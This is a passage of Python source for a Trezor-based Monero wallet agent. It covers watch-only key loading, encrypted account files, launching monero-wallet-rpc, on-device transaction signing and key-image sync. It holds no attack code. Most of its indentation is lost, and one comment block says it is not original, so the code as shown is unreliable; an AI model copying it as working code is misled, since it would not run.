msg = DebugMoneroDiagRequest(ins=diag_code, p1=p1, p2=p2, pd=ints)
try:
resp = self.wait_coro(self.trezor_proxy.call(msg))
print(resp)
except Exception as e:
self.trace_logger.log(e)
logger.warning(e)
complete_sign = Cmd.path_complete
#
# Logic
#
def set_network_type(self, ntype):
self.network_type = ntype
self.agent.network_type = ntype
async def is_connected(self):
"""
Returns True if Trezor is connected
:return:
"""
try:
await self.trezor_proxy.ping()
return True
except Exception as e:
return False
async def load_watchonly(self):
"""
Loads watch-only credentials from connected Trezor
:return:
"""
if not await self.is_connected():
logger.error("Trezor is not connected")
raise agent_misc.TrezorNotRunning("Could not load watch-only credentials")
try:
print(
"Loading watch-only credentials from Trezor. Please, confirm the request on Trezor."
)
self.set_network_type(
monero.NetworkTypes.TESTNET
if self.args.testnet
else monero.NetworkTypes.MAINNET
)
res = await self.agent.get_watch_only() # type: messages.MoneroWatchKey
self.priv_view = crypto.decodeint(res.watch_key)
self.set_address(res.address)
await self.open_with_keys(self.priv_view, self.address)
except Exception as e:
if not self.args:
raise ValueError(e)
else:
logger.warning("Loading watch-only keys failed (but init is not required), %s" % (e,))
async def get_entropy(self, size, path):
"""
Loads entropy from the device, writes to the path
:param size:
:param path:
:return:
"""
logger.info("Loading entropy of %s B to %s" % (size, path))
with open(path, "wb+") as fh:
csize = 0
while csize < size:
req = GetEntropy(size=1024 * 10)
res = await self.trezor_proxy.call_in_session(req) # type: Entropy
csize += len(res.entropy)
logger.debug(
" .. loaded %s / %s (%s %%)" % (csize, size, 100.0 * csize / size)
)
fh.write(res.entropy)
logger.info("Entropy loading done")
def load_params(self):
"""
        Loads runtime parameters from the command-line arguments
:return:
"""
if self.args.rpc_addr:
self.rpc_addr = self.args.rpc_addr
if self.args.watch_wallet:
self.wallet_file = self.args.watch_wallet
if self.args.monero_bin:
self.monero_bin = self.args.monero_bin
def choose_trezor(self):
from monero_glue.trezor import manager as tmanager
r = tmanager.Trezor.enumerate()
noptions = len(r)
if noptions == 0:
self.perror("No TREZOR device found")
raise EnvironmentError("No usable device")
elif noptions == 1:
self.poutput("Detected TREZOR: %s" % r[0])
return str(r[0])
choices = [(i, str(r[i])) for i in range(noptions)]
res = self.select(choices, "Please select from connected devices: ")
return str(r[res])
def monkey_patch_trezorlib(self):
        logger.info(
            "Monkey-patching trezorlib with the current message versions from trezor-common"
        )
try:
import trezorlib
from monero_glue import protobuf
from monero_glue import messages
from trezorlib import protobuf as tprotobuf
tprotobuf.UVarintType = protobuf.UVarintType
tprotobuf.SVarintType = protobuf.SVarintType
tprotobuf.BoolType = protobuf.BoolType
tprotobuf.BytesType = protobuf.BytesType
tprotobuf.UnicodeType = protobuf.UnicodeType
tprotobuf.MessageType = protobuf.MessageType
trezorlib.messages = messages
from trezorlib import mapping
trezorlib.mapping.map_type_to_class = {}
trezorlib.mapping.map_class_to_type = {}
trezorlib.mapping.build_map()
except Exception as e:
logger.error("Monkey patching error: %s" % e)
async def connect(self, path=None):
"""
Connects to the trezor
:return:
"""
if not self.args.poc or (self.args.trezor_path or path):
if self.args.patch_client:
self.monkey_patch_trezorlib()
from monero_glue.trezor import manager as tmanager
t_path = path if path else self.args.trezor_path
if t_path is None or len(t_path) == 0:
self.token_path = self.choose_trezor()
t_path = self.token_path
self.trezor_proxy = tmanager.Trezor(path=t_path, debug=self.token_debug)
else:
self.trezor_proxy = TokenProxy()
ntype = self.agent.network_type if self.agent else self.network_type
self.agent = agent_lite.Agent(
self.trezor_proxy, network_type=ntype
)
async def open_account(self):
"""
Opens the watch only account
:return:
"""
creds_passed = self.args.view_key is not None and self.args.address is not None
account_file_set = self.args.account_file is not None
account_file_ex = (
os.path.exists(self.args.account_file) if account_file_set else False
)
if creds_passed:
await self.open_account_passed()
elif account_file_ex:
await self.open_account_file(self.args.account_file)
else:
self.load_params()
await self.check_params(True)
await self.load_watchonly()
self.load_params()
if account_file_set and not account_file_ex:
await self.check_params(True)
self.wallet_password = await self.prompt_password(True)
# Create watch only wallet file for monero-wallet-rpc
await self.ensure_watch_only()
# Write acquired data to the account file
if account_file_set and not account_file_ex:
await self.save_account(self.args.account_file)
if self.pub_spend:
print(
"Public spend key: %s"
% binascii.hexlify(crypto.encodepoint(self.pub_spend)).decode("ascii")
)
print(
"Public view key : %s"
% binascii.hexlify(crypto.encodepoint(self.pub_view)).decode("ascii")
)
if self.address:
print("Address: %s" % self.address.decode("utf8"))
self.update_intro()
self.update_prompt()
async def check_params(self, new_wallet=False):
"""
All params correctly entered?
:return:
"""
if not new_wallet:
return
if self.args.sign is not None:
return
if self.wallet_file is None:
logger.error(
"--watch-wallet file is not set. Please specify path where to create the monero watch wallet"
)
sys.exit(1)
if self.monero_bin is None:
logger.error(
"--monero-bin is not set. Please specify path to the monero binaries"
)
sys.exit(1)
async def prompt_password(self, new_wallet=False):
"""
Prompts password for a new wallet
:param new_wallet:
:return:
"""
if new_wallet:
passwd = self.ask_password(
"Creating a new wallet. Please, enter the password: ", True
)
else:
passwd = self.ask_password("Please, enter the wallet password: ", False)
return passwd.encode("utf8")
async def save_account(self, file):
"""
Stores account data
:param file:
:return:
"""
if self.wallet_salt is None:
self.wallet_salt = crypto.random_bytes(32)
# Wallet view key encryption
wallet_enc_key = misc.wallet_enc_key(self.wallet_salt, self.wallet_password)
ciphertext = chacha_poly.encrypt_pack(
wallet_enc_key, crypto.encodeint(self.priv_view)
)
with open(file, "w") as fh:
data = {
"view_key_enc": binascii.hexlify(ciphertext).decode("ascii"),
"address": self.address.decode("ascii"),
"network_type": self.network_type,
"wallet_salt": binascii.hexlify(self.wallet_salt).decode("ascii"),
"rpc_addr": self.rpc_addr,
"wallet_file": self.wallet_file,
"monero_bin": self.monero_bin,
}
json.dump(data, fh, indent=2)
async def check_existing_wallet_file(self, key_file):
"""
Checks existing wallet file correctness
:param key_file:
:return:
"""
wl = await wallet.load_keys_file(key_file, self.wallet_password)
addr = wl["key_data"]["m_keys"]["m_account_address"]
spend_pub = addr["m_spend_public_key"]
view_pub = addr["m_view_public_key"]
match = spend_pub == crypto.encodepoint(
self.pub_spend
) and view_pub == crypto.encodepoint(self.pub_view)
net_ver = monero.net_version(self.network_type, False)
addr = monero.encode_addr(net_ver, spend_pub, view_pub)
return addr, match
async def wallet_restore_param(self):
self.poutput(
"Creating a new wallet file, please enter the blockchain height to start a restore of the wallet."
)
self.poutput(
" - Restore height should be a little less than your first incoming transaction to the wallet."
)
self.poutput(' - If the wallet was never used before, enter "-"')
self.poutput(
            ' - If you are not sure enter "0" to start from the beginning (may take a few minutes)'
)
        self.poutput(" - You may also enter a date in the format YYYY-MM-DD\n")
height = 0
sure_stage = False
while True:
if sure_stage:
if (
self.ask_proceed_quit(
"The height: %s. Is it correct? (y/n) " % height
)
== self.PROCEED_YES
):
break
height = misc.py_raw_input("Restore height: ").strip().lower()
if height == "-":
height = await self.wallet_obj.get_height()
sure_stage = True
continue
elif len(height) == 0:
height = 0
sure_stage = True
continue
m = re.match(r"^(\d{4})-(\d{1,2})-(\d{1,2})$", height)
if m:
year, month, day = int(m.group(1)), int(m.group(2)), int(m.group(3))
try:
height = await self.wallet_obj.get_blockchain_height_by_date(
year, month, day
)
sure_stage = True
continue
except Exception as e:
logger.warning("Could not resolve date to the height: %s" % e)
self.trace_logger.log(e)
r = self.ask_proceed_quit(
"Could not resolve date to height. Do you want to try again? (y/n) "
)
if r == self.PROCEED_YES:
continue
else:
return 0
else:
try:
height = int(height)
sure_stage = True
continue
except Exception as e:
self.poutput("Invalid format")
sure_stage = False
continue
return height
async def ensure_watch_only(self):
"""
Ensures watch only wallet for monero exists
:return:
"""
if self.wallet_file is None:
return
key_file = "%s.keys" % self.wallet_file
match, addr = False, None
if self.pub_view and os.path.exists(key_file):
logger.debug("Watch only wallet key file exists: %s" % key_file)
try:
addr, match = await self.check_existing_wallet_file(key_file)
except Exception as e:
logger.error("Wallet key file processing exception: %s" % e)
if not match:
logger.error("Key file address is not correct: %s" % addr)
if not self.args.no_init:
print("Please, move the file so Agent can create correct key file")
sys.exit(2)
return
if not addr and self.args.no_init:
logger.info("Device not initialized, skipping wallet setup")
return
if not self.args.no_init and not self.pub_view:
raise ValueError("Wallet key not loaded")
self.fresh_wallet = True
account_keys = xmrtypes.AccountKeys()
key_data = wallet.WalletKeyData()
restore_height = await self.wallet_restore_param()
self.poutput("Wallet restore height: %s" % restore_height)
wallet_data = wallet.WalletKeyFile()
wallet_data.key_data = key_data
wallet_data.watch_only = 1
wallet_data.testnet = self.network_type == monero.NetworkTypes.TESTNET
wallet_data.refresh_height = restore_height
key_data.m_creation_timestamp = int(time.time())
key_data.m_keys = account_keys
account_keys.m_account_address = xmrtypes.AccountPublicAddress(
m_spend_public_key=crypto.encodepoint(self.pub_spend),
m_view_public_key=crypto.encodepoint(self.pub_view),
)
account_keys.m_spend_secret_key = crypto.encodeint(crypto.sc_0())
account_keys.m_view_secret_key = crypto.encodeint(self.priv_view)
await wallet.save_keys_file(key_file, self.wallet_password, wallet_data)
logger.debug("Watch-only wallet keys generated: %s" % key_file)
async def open_account_passed(self):
"""
Loads passed credentials
:return:
"""
priv_view = self.args.view_key.encode("ascii")
self.priv_view = crypto.b16_to_scalar(priv_view)
self.set_network_type(
monero.NetworkTypes.TESTNET
if self.args.testnet
else monero.NetworkTypes.MAINNET
)
self.set_address(self.args.address.encode("ascii"))
self.wallet_file = self.args.watch_wallet
self.monero_bin = self.args.monero_bin
await self.open_with_keys(self.priv_view, self.address)
async def open_account_file(self, file):
"""
Opens account file
:param file:
:return:
"""
with open(file) as fh:
js = json.load(fh)
# Wallet key encryption
self.wallet_password = await self.prompt_password()
self.wallet_salt = common.defvalkey(js, "wallet_salt")
if self.wallet_salt is None:
self.wallet_salt = crypto.random_bytes(32)
else:
self.wallet_salt = binascii.unhexlify(self.wallet_salt)
# Wallet view key dec.
if "view_key" in js:
self.priv_view = crypto.b16_to_scalar(js["view_key"].encode("utf8"))
elif "view_key_enc" in js:
wallet_enc_key = misc.wallet_enc_key(self.wallet_salt, self.wallet_password)
plain = chacha_poly.decrypt_pack(
wallet_enc_key, binascii.unhexlify(js["view_key_enc"])
)
self.priv_view = crypto.decodeint(plain)
self.wallet_file = js["wallet_file"]
self.monero_bin = js["monero_bin"]
self.set_network_type(js["network_type"])
self.set_address(js["address"].encode("utf8"))
self.rpc_addr = js["rpc_addr"]
await self.open_with_keys(self.priv_view, self.address)
async def open_with_keys(self, view_key, address):
"""
        Processes the private view key + address
:param view_key:
:param address:
:return:
"""
self.pub_view = crypto.scalarmult_base(view_key)
addr_info = monero.decode_addr(address)
self.pub_spend = crypto.decodepoint(addr_info.spend_key)
if not crypto.point_eq(self.pub_view, crypto.decodepoint(addr_info.view_key)):
raise ValueError(
"Computed view public key does not match the one from address"
)
def set_address(self, address):
self.address = address
self.address_info = monero.decode_addr(self.address)
self.address_base_info = monero.decode_addr(self.address)
self.recompute_address()
def recompute_address(self):
D, C = monero.generate_sub_address_keys(
self.priv_view,
crypto.decodepoint(self.address_base_info.spend_key),
self.account_idx,
0,
)
self.address_info.recompute_sub(
crypto.encodepoint(D), crypto.encodepoint(C), self.account_idx
)
self.address = self.address_info.addr
self.update_prompt()
    def set_account(self, new_account_idx):
        self.account_idx = new_account_idx
self.recompute_address()
def wallet_rpc_main(self, *args, **kwargs):
"""
Wallet RPC thread
:return:
"""
rpc_cmd = os.path.join(self.monero_bin, "monero-wallet-rpc")
if not os.path.exists(rpc_cmd):
logger.error("Wallet rpc binary not found: %s" % rpc_cmd)
sys.exit(1)
self.rpc_passwd = misc.gen_simple_passwd(16)
self.wallet_proxy.set_creds(["trezor", self.rpc_passwd])
args = [
"--daemon-address %s" % misc.escape_shell(self.rpc_addr),
"--wallet-file %s" % misc.escape_shell(self.wallet_file),
"--prompt-for-password",
"--rpc-login=trezor",
"--rpc-bind-port %s" % int(self.rpc_bind_port),
]
if self.args.testnet or self.network_type == monero.NetworkTypes.TESTNET:
args.append("--testnet")
if self.args.debug_rpc:
logger.debug("RPC credentials: trezor:%s" % self.rpc_passwd)
def preexec_function():
os.setpgrp()
cmd = "%s %s" % (rpc_cmd, " ".join(args))
feeder = misc.Feeder()
p = misc.run(
cmd,
input=feeder,
async_=True,
stdout=misc.Capture(timeout=0.1, buffer_size=1),
stderr=misc.Capture(timeout=0.1, buffer_size=1),
cwd=os.getcwd(),
env=None,
shell=True,
preexec_fn=preexec_function,
)
ret_code = 1
out_acc, err_acc = [], []
out_cur, err_cur = [""], [""]
logline_pattern = re.compile(r"^([^\s]+)\s+([^\s]+)\s+\[(.+?)\]\s+([^\s]+?)\s+")
passwd_set = False
def log_parse(line):
m = logline_pattern.match(line)
if m is None:
return None
sev = m.group(4).lower()
sevnum = None
if sev == "error":
sevnum = logging.ERROR
elif sev == "warn" or sev == "warning":
sevnum = logging.WARNING
elif sev == "info":
sevnum = logging.INFO
elif sev == "debug":
sevnum = logging.DEBUG
return m.group(1), m.group(2), m.group(3), m.group(4), sevnum
def process_line(line, is_err=False):
dst = err_acc if is_err else out_acc
dst.append(line)
line_parsed = log_parse(line)
line_printed = False
if line_parsed and line_parsed[4] and line_parsed[4] >= logging.ERROR:
logger.error("RPC_%s: %s" % ("ERR" if is_err else "OUT", line))
line_printed = True
if not line_printed and self.args.debug_rpc:
logger.debug("RPC_%s: %s" % ("ERR" if is_err else "OUT", line))
line_low = line.lower()
if "starting wallet" in line_low:
self.rpc_ready = True
self.on_rpc_ready()
def add_output(buffers, is_err=False):
buffers = [x.decode("utf8") for x in buffers]
lines = [""]
dst_cur = err_cur if is_err else out_cur
for x in buffers:
clines = [v.strip("\r") for v in x.split("\n")]
lines[-1] += clines[0]
lines.extend(clines[1:])
dst_cur[0] += lines[0]
nlines = len(lines)
if nlines > 1:
process_line(dst_cur[0])
dst_cur[0] = ""
for line in lines[1:-1]:
process_line(line, is_err)
dst_cur[0] = lines[-1] or ""
try:
while len(p.commands) == 0:
time.sleep(0.15)
self.rpc_running = True
self.update_prompt()
while p.commands[0].returncode is None:
if not passwd_set:
passwd_set = True
feeder.feed(self.wallet_password)
feeder.feed("\n")
feeder.feed(self.rpc_passwd)
feeder.feed("\n")
out, err = p.stdout.read(-1, False), p.stderr.read(-1, False)
if not common.is_empty(out):
add_output([out])
if not common.is_empty(err):
add_output([err], True)
p.commands[0].poll()
if self.terminating and p.commands[0].returncode is None:
feeder.feed("quit\n\n")
misc.sarge_sigint(p.commands[0])
p.close()
if not common.is_empty(out) or not common.is_empty(err):
continue
time.sleep(0.01)
ret_code = p.commands[0].returncode
try_fnc(lambda: p.stdout.close())
try_fnc(lambda: p.stderr.close())
add_output([p.stdout.read(-1, True, 0.15)])
add_output([p.stderr.read(-1, True, 0.15)], True)
self.rpc_running = False
self.update_prompt()
if not self.terminating:
logger.error("Wallet RPC ended prematurely with code: %s" % ret_code)
logger.info("Command: %s" % cmd)
logger.info("Std out: %s" % "\n".join(out_acc))
logger.info("Error out: %s" % "\n".join(err_acc))
except Exception as e:
logger.error("Exception in wallet RPC command: %s" % e)
self.trace_logger.log(e)
def shutdown_rpc(self):
"""
Waits for rpc shutdown
:return:
"""
if self.args.wallet_rpc_addr: # using already running rpc
return
if not self.rpc_running:
return
        # Graceful stop with save
try:
self.wallet_proxy.stop_wallet()
self.terminating = True
time.sleep(1)
except Exception as e:
logger.warning("Stopping wallet failed: %s" % e)
# Terminating with sigint
logger.info("Waiting for wallet-RPC to terminate...")
self.terminating = True
while self.rpc_running:
time.sleep(0.1)
def on_rpc_ready(self):
"""
Called when RPC is started
:return:
"""
self.update_prompt()
async def wallet_rpc(self):
"""
Starts wallet RPC server
:return:
"""
if self.args.wallet_rpc_addr: # using existing RPC?
self.daemon_rpc.set_addr(self.args.rpc_addr)
self.wallet_proxy.set_addr(self.args.wallet_rpc_addr)
self.wallet_proxy.set_creds(self.args.wallet_rpc_creds)
self.rpc_running = True
self.update_prompt()
return
self.wallet_thread = threading.Thread(target=self.wallet_rpc_main, args=(None,))
self.wallet_thread.setDaemon(False)
self.wallet_thread.start()
async def entry(self):
"""
Entry point
:return:
"""
if self.args.debug:
coloredlogs.install(level=logging.DEBUG, use_chroot=False)
misc.install_sarge_filter()
await self.connect()
await self.open_account()
if self.args.sign:
res = await self.sign_wrap(self.args.sign)
return res if isinstance(res, int) else 0
await self.wallet_rpc()
self.update_intro()
self.cmdloop()
self.shutdown_rpc()
logger.info("Terminating")
#
# Sign op
#
def handle_address_input(self, address, payment_id=None):
try:
address = address.encode("ascii") # make bytes
except:
pass
if payment_id and (len(payment_id) != 16 and len(payment_id) != 64):
self.perror("Payment ID can be either 8B or 32B long")
raise ValueError("Invalid payment ID")
try:
addr_info = monero.decode_addr(address)
if addr_info.is_integrated and payment_id:
raise ValueError(
"Address is integrated (contains payment id), redundant payment_id provided"
)
if payment_id:
payment_id = binascii.unhexlify(payment_id)
except Exception as e:
self.perror("Address invalid: %s, error: %s " % (address, e))
raise
return addr_info, payment_id
def transfer_cmd(self, parts):
"""
Transfer logic
:param parts:
:return:
"""
priority, mixin, payment_id = parts.priority, parts.mixin, parts.payment_id
aux_data = SignAuxData()
aux_data.destinations = []
addr_amnt = parts.address_amounts
destinations = []
new_payment_id = None
for idx, cur in enumerate(addr_amnt):
addr_info, tmp_payment_id = self.handle_address_input(cur[0], payment_id)
amount_atomic = misc.amount_to_uint64(cur[1])
aux_data.destinations.append((addr_info, amount_atomic))
destinations.append(
{"amount": amount_atomic, "address": addr_info.addr.decode("ascii")}
)
if tmp_payment_id:
new_payment_id = tmp_payment_id
print("Sending %s monero to %s" % (cur[1], cur[0]))
print(
"Priority: %s, mixin: %s, payment_id: %s"
% (
priority if priority else "default",
mixin if mixin else "default",
binascii.hexlify(new_payment_id).decode("ascii")
if new_payment_id
else "-",
)
)
ask_res = self.ask_proceed_quit("Do you confirm (y/n) ? ")
if ask_res != self.PROCEED_YES:
return
params = {
"destinations": destinations,
"account_index": self.account_idx,
"subaddr_indices": parts.indices,
"unlock_time": 0,
"get_tx_keys": True,
"do_not_relay": True,
"get_tx_hex": False,
"get_tx_metadata": False,
}
if priority is not None:
params["priority"] = priority
if mixin is not None:
params["mixin"] = mixin
if new_payment_id is not None:
params["payment_id"] = binascii.hexlify(new_payment_id).decode("ascii")
# Call RPC to prepare unsigned transaction
self.transfer_params(params, aux_data)
def sweep_params(self, parts, is_all=False, is_below=False, is_single=False):
params = {"do_not_relay": True}
if parts.priority is not None:
params["priority"] = parts.priority
if parts.mixin is not None:
params["ring_size"] = parts.mixin
if parts.payment_id is not None:
params["payment_id"] = parts.payment_id
if parts.amount_threshold is not None:
params["below_amount"] = misc.amount_to_uint64(parts.amount_threshold)
if parts.key_image is not None:
params["key_image"] = parts.key_image
if not is_single:
params["account_index"] = self.account_idx
params["subaddr_indices"] = parts.indices
params["address"] = parts.address
return params
def sweep_cmd(self, parts, is_all=False, is_below=False, is_single=False):
params = self.sweep_params(parts, is_all, is_below, is_single)
if is_single:
res = self.wallet_proxy.sweep_single(params)
else:
res = self.wallet_proxy.sweep_all(params)
if "result" not in res:
logger.error("Sweep error: %s" % res)
raise ValueError("Could not transfer")
result = res["result"]
amounts = common.defvalkey(
result, "amount_list", [common.defvalkey(result, "amount")]
)
fees = common.defvalkey(result, "fee_list", [common.defvalkey(result, "fee")])
for idx in range(len(amounts)):
st = "Amount: %s" % wallet.conv_disp_amount(amounts[idx])
if idx < len(fees):
st += ", Fee: %s" % wallet.conv_disp_amount(fees[idx])
self.poutput(st)
ask_res = self.ask_proceed_quit("Do you confirm (y/n) ? ")
if ask_res != self.PROCEED_YES:
return
unsigned = binascii.unhexlify(result["unsigned_txset"])
self.wait_coro(self.sign_unsigned(unsigned))
def transfer_params(self, params, aux_data=None):
res = self.wallet_proxy.transfer_split(params)
if "result" not in res:
logger.error("Transfer error: %s" % res)
raise ValueError("Could not transfer")
result = res["result"]
amounts = common.defvalkey(
result, "amount_list", [common.defvalkey(result, "amount")]
)
fees = common.defvalkey(result, "fee_list", [common.defvalkey(result, "fee")])
for idx in range(len(amounts)):
st = "Amount: %s" % wallet.conv_disp_amount(amounts[idx])
if idx < len(fees):
st += ", Fee: %s" % wallet.conv_disp_amount(fees[idx])
self.poutput(st)
ask_res = self.ask_proceed_quit("Do you confirm (y/n) ? ")
if ask_res != self.PROCEED_YES:
return
if "unsigned_txset" not in result:
logger.error(
"Unsigned transaction not found in the response. "
"Please make sure you are using compatible monero-wallet-rpc"
)
logger.debug(res)
return
unsigned = binascii.unhexlify(result["unsigned_txset"])
self.wait_coro(self.sign_unsigned(unsigned, aux_data))
async def sign_unsigned(self, unsigned_txset, aux_data=None):
"""
Signs unsigned txset with the Trezor
:param unsigned_txset:
:return:
"""
res = await self.sign_wrap(fdata=unsigned_txset, aux_data=aux_data)
if isinstance(res, int):
logger.error("Error")
return
print("Transaction has been signed. ")
ask_res = self.ask_proceed_quit("Do you wish to submit (y/n) ? ")
if ask_res != self.PROCEED_YES:
return
params = {"tx_data_hex": binascii.hexlify(res).decode("ascii")}
res = self.wallet_proxy.submit_transfer(params)
try:
if len(res["result"]["tx_hash_list"]) == 0:
raise ValueError("Transaction submit failed")
print("SUCCESS: Transaction has been submitted!")
except Exception as e:
logger.debug("Res: %s" % res)
print("Transaction submit failed: %s" % e)
async def sign_wrap(self, file=None, fdata=None, aux_data=None):
"""
Sign wrapper
:param file:
:param fdata:
:param aux_data:
:return:
"""
if not self.priv_view:
logger.error("View key not set, cannot sign")
return -3
try:
return await self.sign(file, fdata, aux_data=aux_data)
except agent_misc.TrezorReturnedError as e:
self.trace_logger.log(e)
print("Trezor returned an error: %s" % e)
return 1
except agent_misc.TrezorNotRunning as e:
logger.error("Trezor server is not running")
return 2
async def sign(self, file=None, fdata=None, aux_data=None):
"""
Performs TX signature
:param file:
:param fdata:
:param aux_data:
:return:
"""
try:
await self.trezor_proxy.ping()
except Exception as e:
raise agent_misc.TrezorNotRunning(e)
if file and not os.path.exists(file):
raise ValueError("Could not find unsigned transaction file")
data = fdata
if data is None:
with open(file, "rb") as fh:
data = fh.read()
msg = await wallet.load_unsigned_tx(self.priv_view, data)
# Key image sync
# key_images = await self.agent.import_outputs(msg.transfers)
# For now sync only spent key images to the hot wallet.
key_images = [td.m_key_image for td in msg.transfers]
max_ki_size = 0
if len(key_images) == 0:
logger.info("Wallet did not return transfer list :/")
for tx in msg.txes:
for idx in range(len(tx.selected_transfers)):
max_ki_size = max(max_ki_size, tx.selected_transfers[idx])
key_images = [crypto.identity(True)] * (max_ki_size + 1)
txes = []
pendings = []
for tx in msg.txes: # type: xmrtypes.TxConstructionData
print("Signing transaction with Trezor")
print("Please check the Trezor and confirm / reject the transaction\n")
res = await self.agent.sign_transaction_data(tx, aux_data=aux_data)
cdata = self.agent.last_transaction_data()
await self.store_cdata(cdata, res, tx, msg.transfers)
# obj = await xmrobj.dump_message(None, res)
# print(xmrjson.json_dumps(obj, indent=2))
# Key image sync for spent TXOs
# Updating only spent.
for idx in range(len(tx.selected_transfers)):
idx_mapped = cdata.source_permutation[idx]
key_images[tx.selected_transfers[idx_mapped]] = res.vin[idx].k_image
txes.append(await self.agent.serialize_tx(res))
pending = wallet.construct_pending_tsx(res, tx)
pendings.append(pending)
# Key images array has to cover all transfers sent.
# Watch only wallet does not have key images.
signed_tx = xmrtypes.SignedTxSet(ptx=pendings, key_images=key_images)
signed_data = await wallet.dump_signed_tx(self.priv_view, signed_tx)
with open("signed_monero_tx", "wb+") as fh:
fh.write(signed_data)
print("Signed transaction file: signed_monero_tx")
print(
"Key images: %s"
% [binascii.hexlify(ff).decode("utf8") for ff in key_images]
)
for idx, tx in enumerate(txes):
fname = "transaction_%02d" % idx
with open(fname, "wb+") as fh:
fh.write(tx)
# relay_fname = 'transaction_%02d_relay.sh' % idx
# hex_ctx = binascii.hexlify(tx).decode('utf8')
# with open(relay_fname, 'w+') as fh:
# fh.write('#!/bin/bash\n')
# fh.write('curl -X POST http://%s/sendrawtransaction '
# '-d \'{"tx_as_hex":"%s", "do_not_relay":false}\' '
# '-H \'Content-Type: application/json\'\n' % (self.args.rpc_addr, hex_ctx))
#
# print('Transaction %02d stored to %s, relay script: %s' % (idx, fname, relay_fname))
# Relay:
# payload = {'tx_as_hex': hex_ctx, 'do_not_relay': False}
# resp = requests.post('http://%s/sendrawtransaction' % (self.args.rpc_addr, ), json=payload)
# print('Relay response: %s' % resp.json())
# print('Please note that by manual relaying hot wallet key images get out of sync')
return signed_data
async def store_cdata(self, cdata, signed_tx, tx, transfers):
"""
Stores transaction data for later usage.
- cdata.enc_salt1, cdata.enc_salt2, cdata.enc_keys
- tx_keys are AEAD protected, key derived from spend key - only token can open.
- construction data for further proofs.
:param cdata:
:param signed_tx:
:param tx:
:param transfers:
:return:
"""
hash = cdata.tx_prefix_hash
prefix = binascii.hexlify(hash[:12])
tx_key_salt = crypto.random_bytes(32)
tx_key_inp = hash + crypto.encodeint(self.priv_view)
tx_view_key = crypto.pbkdf2(tx_key_inp, tx_key_salt, 2048)
unsigned_data = xmrtypes.UnsignedTxSet()
unsigned_data.txes = [tx]
unsigned_data.transfers = transfers if transfers is not None else []
writer = xmrserialize.MemoryReaderWriter()
ar = xmrboost.Archive(writer, True)
await ar.root()
await ar.message(unsigned_data)
unsigned_key = crypto.keccak_2hash(b"unsigned;" + tx_view_key)
ciphertext = chacha_poly.encrypt_pack(unsigned_key, bytes(writer.get_buffer()))
# Serialize signed transaction
writer = xmrserialize.MemoryReaderWriter()
ar = xmrserialize.Archive(writer, True)
await ar.root()
await ar.message(signed_tx)
signed_tx_bytes = writer.get_buffer()
signed_tx_hmac_key = crypto.keccak_2hash(b"hmac;" + tx_view_key)
signed_tx_hmac = crypto.compute_hmac(signed_tx_hmac_key, signed_tx_bytes)
try:
js = {
"time": int(time.time()),
"hash": binascii.hexlify(hash).decode("ascii"),
"enc_salt1": binascii.hexlify(cdata.enc_salt1).decode("ascii"),
"enc_salt2": binascii.hexlify(cdata.enc_salt2).decode("ascii"),
"tx_keys": binascii.hexlify(cdata.enc_keys).decode("ascii"),
"unsigned_data": binascii.hexlify(ciphertext).decode("ascii"),
"tx_salt": binascii.hexlify(tx_key_salt).decode("ascii"),
"tx_signed": binascii.hexlify(signed_tx_bytes).decode("ascii"),
"tx_signed_hmac": binascii.hexlify(signed_tx_hmac).decode("ascii"),
}
with open("transaction_%s.json" % prefix.decode("ascii"), "w") as fh:
json.dump(js, fh, indent=2)
fh.write("\n")
except Exception as e:
self.trace_logger.log(e)
print(
"Unable to save transaction data for transaction %s"
% binascii.hexlify(hash).decode("ascii")
)
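    # A compact sketch (not original code) restating the key-derivation chain that
    # store_cdata() above already performs, so the scheme is visible at a glance:
    #   tx_view_key  = crypto.pbkdf2(tx_prefix_hash + crypto.encodeint(priv_view), tx_key_salt, 2048)
    #   unsigned_key = crypto.keccak_2hash(b"unsigned;" + tx_view_key)  # encrypts the unsigned tx set
    #   hmac_key     = crypto.keccak_2hash(b"hmac;" + tx_view_key)      # authenticates the signed tx blob
    # Re-deriving these keys requires the private view key plus the stored tx_salt and tx hash.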
async def key_image_sync(self, line):
"""
Key image sync with Trezor
:param line:
:return:
"""
res = self.wallet_proxy.export_outputs()
outputs_data_hex = res["result"]["outputs_data_hex"]
outs_data = binascii.unhexlify(outputs_data_hex)
exps = await wallet.load_exported_outputs(self.priv_view, outs_data)
# Check if for this address
match = exps.m_spend_public_key == crypto.encodepoint(
self.pub_spend
) and exps.m_view_public_key == crypto.encodepoint(self.pub_view)
net_ver = monero.net_version(self.network_type, False)
addr = monero.encode_addr(
net_ver, exps.m_spend_public_key, exps.m_view_public_key
)
if not match:
logger.error(
"Exported outputs from different wallet: %s" % addr.decode("ascii")
)
return
self.poutput("Exported outputs loaded.")
self.poutput("Please confirm the key image sync on the Trezor ")
res = await self.agent.import_outputs(exps.tds)
# Generate import key image requests
key_images = []
for kie in res:
key_images.append(
{
"key_image": binascii.hexlify(kie[0]).decode("ascii"),
"signature": binascii.hexlify(kie[1][0] + kie[1][1]).decode(
"ascii"
),
}
)
import_req = {"signed_key_images": key_images}
res = self.wallet_proxy.import_key_images(import_req)
print("Height: %s" % res["result"]["height"])
print("Spent: %.5f" % wallet.conv_disp_amount(res["result"]["spent"]))
print("Unspent: %.5f" % wallet.conv_disp_amount(res["result"]["unspent"]))
async def main(self):
"""
Entry point
:return:
"""
parser = argparse.ArgumentParser(description="Trezor Agent")
parser.add_argument("--address", dest="address", help="Full address")
parser.add_argument(
"--view-key", dest="view_key", help="Hex coded private view key"
)
parser.add_argument(
"--account-file",
dest="account_file",
help="Account file with watch-only creds",
)
parser.add_argument(
"--watch-wallet", dest="watch_wallet", help="Watch-only wallet files"
)
parser.add_argument(
"--monero-bin", dest="monero_bin", help="Directory with monero binaries"
)
parser.add_argument(
"--rpc-addr", dest="rpc_addr", default=None, help="RPC address of full node"
)
parser.add_argument(
"--rpc-wallet",
dest="wallet_rpc_addr",
default=None,
help="Use running monero-wallet-rpc",
)
parser.add_argument(
"--rpc-wallet-creds",
dest="wallet_rpc_creds",
default=None,
help="Running monero-wallet-rpc credentials",
)
parser.add_argument(
"--sign", dest="sign", default=None, help="Sign the unsigned file"
)
parser.add_argument(
"--debug",
dest="debug",
default=False,
action="store_const",
const=True,
help="Debugging output",
)
parser.add_argument(
"--debug-rpc",
dest="debug_rpc",
default=False,
action="store_const",
const=True,
help="Prints output of the RPC wallet",
)
parser.add_argument(
"--testnet",
dest="testnet",
default=False,
action="store_const",
const=True,
help="Testnet",
)
parser.add_argument(
"--slip0010",
dest="slip0010",
default=True,
action="store_const",
const=True,
help="SLIP0010 wallet derivation (deprecated, always true)",
)
parser.add_argument(
